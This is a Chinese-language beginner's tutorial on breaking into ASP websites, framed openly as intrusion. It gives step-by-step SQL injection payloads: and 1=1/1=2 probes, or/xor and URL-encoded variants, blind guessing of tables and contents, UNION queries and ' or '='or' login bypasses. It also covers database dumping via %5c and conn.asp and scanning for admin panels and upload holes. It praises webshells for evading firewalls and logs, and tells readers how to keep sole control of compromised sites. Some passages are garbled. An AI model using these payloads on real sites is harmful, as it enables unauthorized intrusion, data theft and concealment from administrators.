黑客怎么入侵网站(网站渗透入侵教程)

新手必看-脚本入侵-ASP网站入侵一些技巧 先说明下 先看下是不是html转的asp生成的站

webshell 最大的优点就是可以穿越防火墙,由于与被控制的服务器或远程主机交换的数据都是通过80端口传递的,因此不会被防火墙拦截。并且使用webshell一般不会在系统日志中留下记录,只会在网站的web日志中留下一些数据提交记录,没有经验的管理员是很难看出入侵痕迹的。

这里讲的是和sql和asp马对网站的提权,再说一下系列文章的问题,很多开始原来有些部分进行的增加或者修改,所以大家直接去微博、知乎、公众号直接翻文章阅读或者点关键字和链接直接访问。找不到的会贴部分链接到文章底部,出来直接点击就好了。

1.什么是脚本

脚本是指全部网页编程语言的一个代名词

2.什么是脚本入侵

脚本入侵是指利用网页编程语言进行入侵的行为

3.什么要学习脚本入侵

现在我问你一个问题:你觉得入侵一个网站,也可以说拿下一个服务器,比起入侵一台个人的电脑,比如XP系统的,哪个更简单? 直接切入主题具体操作步骤。

黑客怎么入侵网站(网站渗透入侵教程)

新手脚本入侵步骤

视频演示在中国黑客协会官网都有教程和零基础网盘

如果是html格式的站,

我们先打开网站,

然后单击鼠标右键 按查看源文件-编辑-查找,

输入asp 看有没有网站ASP文件或ASP带参数,

1:注入点

先把IE菜单=>工具=>Internet选项=>高级=>显示友好 HTTP 错误信息前面的勾去掉。

否则,不论服务器返回什么错误,IE都只显示为HTTP 500服务器错误,不能获得更多的提示信息。

案例:

http://site/web0day.asp?id=1

我们在这个地址后面加上单引号’ 然后and 1=1 正确 and 1=2 错误的话就说明存在注入漏洞了!

注入点爆库方法

先举个例子一个注入

http://site/asp/web0day.asp?id=1

然后改成爆库

http://site/asp%5cweb0day.asp?id=1

利用%5c爆数据库

如果不注入点的话 就用批量扫描注入点工具扫描 防注入就用中转注入

2:上传漏洞

用一些扫描上传漏洞字典或工具扫描 百度搜索把一大把

3:后台

1:

一般站都是admin manage目录 有这个目录不可以见后台

用一些扫描后台漏洞字典或工具扫描

注入如果没有办法的情况 我们就一个网站目录扫描

比如:

http://www.heikexiehui.com/manage/

2:或单击网站图片按 鼠标右键-属性 看地址

比如

http://www. heikexiehui .com/images/123.jpg

我们可以看下可以列目录不

http://www. heikexiehui .com/images/

如果是http://www. heikexiehui .com/admin/images/123.jpg

一般都后台http://www. heikexiehui .com/admin/ 有时候可以直接转到后台

不行的话就直接这个目录用字典或工具扫描。

3:看网站做下面版权备案那里 看

比如Powered by xxx的 或网站连接

4:后台入侵

一般入侵后台常用的密码admin admin admin admin888 等等

万能密码’or’=’or’ ‘xor ‘xor

5:编辑器漏洞 不会的就在百度搜索把一大把

6:注入点入侵的一些问题

1:有时候注入点找不到表段 先看后台有没有什么相关的资源

看网站做下面版权备案那里 看 比如Powered by xxx的 或网站连接 在百度下源码分析

2:有时候注入点找不到字段 我们就到后台-按查看源文件 看用户一些字段

接下来讲一些包括前面提到的dos命令行和比较简单的注入代码口令!

强调一下,手工注入和练习是一定要的,工具是很方便,但是有些地方还是需要手工操作!

所以如果你完全不会、也不愿意学代码的操作,你没有办法执行任何操作。

防注入解决办法:

1>使用or 2>1 ; or 1>2来进行判断

结果:分别返回不同的页面,说明存在注入漏洞.

分析:or注入只要求前后两个语句只要有一个正确就为真,如果前后两个语句都是正确的,反而为假。 记住:or注入时,or后面的语句如果是正确的,则返回错误页面!如果是错误,则返回正确页面 ,说明存在注入点。

2> 使用xor 1=1; xor 1=2

结果:分别返回不同的页面,说明存在注入漏洞.

分析:xor 代表着异或,意思即连接的表达式仅有一个为真的时候才为真。 记住:xor注入时,xor后面的语句如果是正确的,则返回错误页面积,如果是错误,则返回正确 页面,说明存在注入点。

3>把and 1=1转换成URL编码形式后在提交 and 1=1 URL编码:%41%4E%44%20%%31%3D%31

4>使用-1;-0

分析:如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞.

3、字符型判断是否有注入:

语句:’ and ‘1’=1;’ and ‘1=2(经典)

结果:分别返回不同的页面,说明存在注入漏洞.

分析:加入’ and ‘1’=1返回正确页面,加入’ and ‘1=2返回错误页面,说明有注入漏同。

防注入解决办法:

在URL的地址后面加上’%2B’(字符型)

分析:URL地址变为:news.asp?id=123’%2B’,返回的页面和1同;加 上’2%2B’asdf,URL地址变为:news.asp?id=123’%2Basdf,返回的页面和1 不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。

搜索型判断是否有注入:

简单的判断搜索型注入漏洞存在不存在的办法是先搜索’,如果出错,说明90%存在这个漏洞。然后搜索%,如果正常返回,说明95%有洞了。

说明:加入如”&”、”[“、”]”、”%”、”$”、”@”等特殊字符,都可以实现,如果出现错误,说明有问题。

操作: 搜索一个关键字,比如2006吧,正常返回所有2006相关的信息,再搜索2006%’and 1=1 and ‘%’=’和 2006%’and 1=2 and ‘%’=’,存在异同的话,就是100%有洞了。关键字%’ and 1=1 and ‘%’=’% 关键字%’ and 1=2 and ‘%’=’% 将and 1=1 换成注入语句就可以了

判断数据库类型:

and user>0

例如:showdetail.asp?id=49 ;and user>0 如果是ACCESS数据库,那么返回的错误里一般会有”Microsoft JET Database”关键定,如果是MSSQL数 据库的话返回的错误提示里一般会含有”SQL Server”关键了.

猜表名 and exists (select * from 表名)

说明:意思与上面一样,只是用的语名不一样。

猜列名 and (select count(列名) from 表名)>0

说明:如果我们输入的列名猜解正确否反回正常页面

猜长度 and (select top 1 len(username) from admin)>0

说明:如果我们输入的最后一位数据返回错误,而错误前一位数字返回正确,说明我所猜解的长度 为正确。

猜内容 and (select top 1 asc(mid(username,1,1)) from admin)>50 ascii码1-128

说明:如果我们输入的最后一位数据返回错误,而错误前一位数字返回正确,说明我所猜解的数字正确。(可以使用折半法猜内容)

折半法:最小值与最大值差的一半,比如输入50返正确,输入100返回错误,折半后输入75。

两种常见爆库

1、%5c

2、conn.asp

%5c暴库 把二级目录中间的/换成%5c EY: otherweb … s.asp?BigClassName=职 责范围&BigClassType=1 如果你能看到:’E:ahttc040901 otherwebdzdatabaseiXuEr_Studio.asa’不是一 个有效的 路径。 确定路径名称拼写是否正确, 以及是否 连接到文件存放的服务器。 这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行 .

conn.asp暴库 这个也是比较老的漏洞,利用价值不大

常见的:’or’=’or’万能密码登陆

’or’=’or’这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有 : ’or’’=’ ” or “a”=”a ’) or (’a’=’a “) or (“a”=”a or 1=1– ’ or ’ a’=’a 一个很老的利用方法,主要用于一些比较老的网站。

联合查询注入(union查询)

操作步骤:

1>在正常语句后台加入 and 1=2 union select * form 表名,其中*号代表字段数量,从1一直追加 (and 1=2 union select 1,2,3,4 form 表名)如果字段数正确就会有暴错

2>在页面显示数字的地方用真实得到的字段名代替,如:username,password.

3>在页面字段值处暴出真实的数据库字段值。

还有很多一句话木马和后面的操作,都有现成的都是别人写的,你有自己的思路,拿了漏洞自己也都可以写,别人的很多的都是已经现在实现不了可能就失效了,稍微用的多点的就是中国菜刀了,拿的站点也是非常弱的,还有个情况就是拿站测试的时候,后门非常的多,你刚刚拿下过不了多久又被别人改了,所以你想独占的话需要点心思。

*本文作者:花无涯,转载请注明。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 387999187@qq.com 举报,一经查实,本站将立刻删除。https://www.8118.com.cn/chuang/7972.html
返回顶部